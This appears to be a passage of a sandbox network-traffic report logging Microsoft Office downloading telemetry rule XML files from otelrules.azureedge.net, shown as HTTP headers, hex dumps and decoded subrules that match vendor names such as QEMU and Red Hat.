                                                                                                                            2024-10-06 11:50:25 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            113192.168.2.64985613.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:25 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:25 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:25 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 469
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                            x-ms-request-id: b67c2655-301e-0096-2300-17e71d000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115025Z-1657d5bbd48xsz2nuzq4vfrzg800000001s000000000bhpm
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:25 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            114192.168.2.64985713.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:25 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:25 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:25 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 416
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                            x-ms-request-id: 821e4157-c01e-0014-3301-17a6a3000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115025Z-1657d5bbd48dfrdj7px744zp8s00000001kg00000000gf6s
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:25 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            115192.168.2.64985813.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:25 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:25 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:25 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 472
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                            x-ms-request-id: 763e8d43-601e-000d-6912-172618000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115025Z-1657d5bbd48vlsxxpe15ac3q7n00000001tg00000000fhyx
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            116192.168.2.64985913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:25 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:26 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:25 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 432
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                            x-ms-request-id: bfab55ab-401e-0015-6202-170e8d000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115025Z-1657d5bbd4824mj9d6vp65b6n40000000250000000008140
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:26 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            117192.168.2.64986013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:25 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:26 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:25 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 475
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                            x-ms-request-id: 01bf113a-f01e-003c-3703-178cf0000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115025Z-1657d5bbd48cpbzgkvtewk0wu0000000021g000000006r0k
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:26 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            118192.168.2.64986113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:25 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:26 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:25 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 427
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                            x-ms-request-id: 7875ffac-201e-000c-7f02-1779c4000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115025Z-1657d5bbd48sqtlf1huhzuwq7000000001m000000000e2cq
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:26 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            119192.168.2.64986213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:26 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:26 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:26 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 474
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                            x-ms-request-id: 3b7b7106-501e-0064-43e7-161f54000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115026Z-1657d5bbd48q6t9vvmrkd293mg00000001u000000000e44q
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:26 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            120192.168.2.64986413.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:26 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:27 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:26 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                            x-ms-request-id: 3c7823fd-401e-0015-0c60-170e8d000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115026Z-1657d5bbd48xsz2nuzq4vfrzg800000001q000000000guh3
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:27 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            121192.168.2.64986813.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:26 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:27 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:26 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 174
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                            x-ms-request-id: 0607cd43-401e-0078-1b00-174d34000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115026Z-1657d5bbd482lxwq1dp2t1zwkc00000001t0000000001ny1
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:27 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            122192.168.2.64986613.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:26 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:27 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:26 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 472
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                            x-ms-request-id: 2f576d96-401e-0047-3902-178597000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115026Z-1657d5bbd48xlwdx82gahegw40000000023000000000c5k2
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:27 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            123192.168.2.64986513.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
